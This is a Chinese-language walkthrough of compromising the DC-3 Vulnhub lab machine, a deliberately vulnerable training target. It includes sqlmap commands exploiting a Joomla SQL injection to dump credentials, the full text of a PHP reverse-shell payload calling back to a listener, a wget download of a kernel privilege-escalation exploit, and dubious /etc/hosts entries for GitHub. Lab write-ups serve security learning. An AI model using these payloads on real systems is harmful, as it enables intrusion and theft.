2. 程式人生 > 實用技巧 >DC-3靶機滲透提權

DC-3靶機滲透提權

阿新 發佈:2020-08-15

0x01 收集DC-3靶機的資訊

利用nmap工具掃描DC-3的資訊

利用msf工具掃描出對應的版本資訊

0x02 獲取網站管理員的使用者名稱和密碼

利用searchsploit查詢針Joomla 3.7 的漏洞

檢視對應的檔案中的攻擊方式說明

執行檔案中sqlmap語句進行爆庫

sqlmap -u "http://10.3.139.18/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

成功獲取網站中的資料庫

嘗試獲取joomladb庫中的表

sqlmap -u "http://10.3.139.18/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

在joomladb中一共有76個表,#__uses表中應該儲存了賬密欄位

嘗試獲取#__users表中的欄位

sqlmap -u "http://10.3.139.18/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --columns -p list[fullordering]

獲取欄位名過程中發現不能直接從表中取出欄位,根據提示進行操作

成功獲取users表中的6個欄位

嘗試獲取欄位username和password的內容

sqlmap -u "http://10.3.139.18/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C 'username,password' -dump -p list[fullordering]

成功獲取使用者名稱和密碼的hash

利用john工具對密碼進行爆破

利用niktod或joomscan對網站進行掃描,獲取網站目錄

訪問/administrator頁面,使用之前得到的使用者名稱和密碼進行登入

成功登入之後,點選檢視系統資訊,發現系統及其核心的版本

0x03 取得shell並提權

3.1 上傳檔案獲取反彈shell

點選Extensions — Templates — Beez3 Details and Files

通過 ip/templates/beez3/html 可以訪問該頁面中資料夾的內容

利用msfvenom生成反彈shell的PHP檔案

# 命令不支援補全,LHOST為開啟監聽主機的IP,LPORT為監聽埠
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.104 LPORT=7777 R

<?php /**/ error_reporting(0); $ip = '10.10.10.104'; $port = 7777; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

將生成的程式碼寫入網站html資料夾下的reshell.php檔案

通過瀏覽器可以訪問html這個目錄

(PS: 我是在不同時間段完成提權部分和之前的爆庫部分,所以IP改變了,不過不影響實驗)

先在msfconsole上開啟監聽,再訪問上傳的php檔案便可以成功連線

3.2 提權並檢視flag

根據之前獲取的系統和核心資訊查詢DC3的可利用漏洞,並將說明文件下載至當前目錄下

檢視具體用法以及效果演示

將壓縮包檔案下載到本地並解壓

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

如果用 wget命令從GitHub下載失敗時,可以往/etc/hosts檔案中新增以下內容

# Github Start
52.74.223.119 github.com
192.30.253.119 gist.github.com
54.169.195.147 api.github.com
185.199.111.153 assets-cdn.github.com
151.101.76.133 raw.githubusercontent.com

之前已經建立了連線,現在將exploit.tar上傳到伺服器的/tmp目錄下

進入目標系統的shell,利用python3調出互動式命令直譯器,並將上傳的壓縮包進行解壓

python3 -c 'import pty;pty.spawn("/bin/bash")'

將上傳的壓縮包進行解壓,並進入到解壓目錄

執行過程會出現編譯錯誤,忽略即可

成功取得root許可權,切換到至/root目錄下檢視flag

更改root密碼後,檢視登陸DC-3靶機後的介面

相關推薦

DC-3靶機滲透

0x01收集DC-3靶機的資訊 利用nmap工具掃描DC-3的資訊 利用msf工具掃描出對應的版本資訊

vulnhub-DC:3靶機滲透記錄

vulnhub-DC:3靶機滲透記錄 準備工作 在vulnhub官網下載DC:1靶機www.vulnhub.com/entry/dc-3,312/

DC 1-3 靶機滲透

DC-1靶機 埠加內網主機探測,發現192.168.114.146這臺主機,並且開放了有22,80,111以及48683這幾個埠。

Enumy:一款功能強大的Linux後滲透列舉工具

Enumy是一款功能強大的Linux後滲透提權列舉工具,該工具是一個速度非常快的可移植可執行檔案,廣大研究人員可以在針對Linux裝置的滲透測試以及CTF的後滲透階段利用該工具實現許可權提升,而Enumy執行之後將能夠幫助

vulnhub-DC:2靶機滲透記錄

vulnhub-DC:2靶機滲透記錄 準備工作 在vulnhub官網下載DC:1靶機https://www.vulnhub.com/entry/dc-2,311/

vulnhub-DC:4靶機滲透記錄

vulnhub-DC:4靶機滲透記錄 準備工作 在vulnhub官網下載DC:4靶機https://www.vulnhub.com/entry/dc-4,313/

vulnhub-DC:6靶機滲透記錄

vulnhub-DC:6靶機滲透記錄 準備工作 在vulnhub官網下載DC:6靶機DC: 6 ~ VulnHub 匯入到vmware,設定成NAT模式

vulnhub-DC:7靶機滲透記錄

vulnhub-DC:7靶機滲透記錄,drupal框架,利用搜索引擎資訊收集,drush命令,weevely使用,利用root許可權執行檔案

vulnhub-DC:8靶機滲透記錄

vulnhub-DC:8靶機滲透記錄sqlmap注入,john解密,msf後門 準備工作 在vulnhub官網下載DC:8靶機DC: 8 ~ VulnHub

滲透過程中的資料庫思路

滲透測試中,我們可能誤打誤撞得到了幾個粗心管理員的資料庫密碼,當我們一臉欣喜的連線上後,卻發現庫子裡一清二白,或者找不到跟web專案的對應關係,那就只能從資料庫層面入手,一步步奪取目標主機許可權

hackthebox-Mango(mongodb滲透 & jjs

這臺靶機太卡了。無語 1、掃描 很常規的22可能有ssh登入,80,443web資訊蒐集 另外結果顯示掃描出新地址staging-order.mango.htb,加到本機/etc/hosts

Raven2靶機、Mysql

Raven2靶機、Mysql Raven: 2 ~ VulnHub 資訊收集 Nmap掃埠 80埠資訊 一個.DS_Store檔案洩露(好像沒什麼用)、一個vendor資料夾和一個登陸後臺頁面

【域滲透】利用S4U2self

一、利用場景 當獲取域內機器許可權,許可權為iis、Network Service等許可權,就可以利用S4u2Self進行許可權提升,儘管要在帳戶上專門啟用約束委派才能使用S4U2proxy 跨系統“使其工作”,但任何具有 SPN 的主體都可

靶機Vulnhub的Empire Breakout攻略(不含

首先掃描目標有哪些開放的埠: # nmap -sV -A -sC -p- 192.168.140.164 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-14 00:16 EDT

CVE-2019-13272 核心漏洞手記

poc: github kernel-bug-summary: blog 中文簡述:嘶吼 CVE: CVE-2019-13272 要點 簡單總結:即利用併發條件下,子程式在獲取父程式的同時,父程式的憑證得以切換至root來使得子程式同時獲得root許可權。

windows

schtasks命令使用 schtasks命令比at命令更靈活。而且在Windows Vista、Windows Server 2008及之後版本的作業系統已經棄用at命令。建立一個名稱為\"test\"的計劃任務,啟動許可權為system

[總結]Windows總結

0x01 簡介 可分為縱向與橫向:縱向:低許可權角色獲得高許可權角色的許可權;橫向:獲取同級別角色的許可權。

Kali虛擬機器利用msf17-010執行RCE(針對Windows Server 2008以及2003)

寫在前面: 老師上課的演示是利用了ms17-010的exploit/windows/smb/ms17_010_enternalblue,我們可以通過use exploit/windows/smb/ms17_010_enternalblue再info檢視適用於什麼版本,否則拿這個去攻擊Windows Server 2

記一次WindowsServer2012 - 爛土豆

Emm Shell都好久了 操 最近好鐵鐵又喊我來 因為自己不怎麼會,最近學了一點 放了學就回家抓緊吃完飯開始

MS16-032 windows本地

試用系統:Tested on x32 Win7,x64 Win8,x64 2k12R2 powershell指令碼: https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1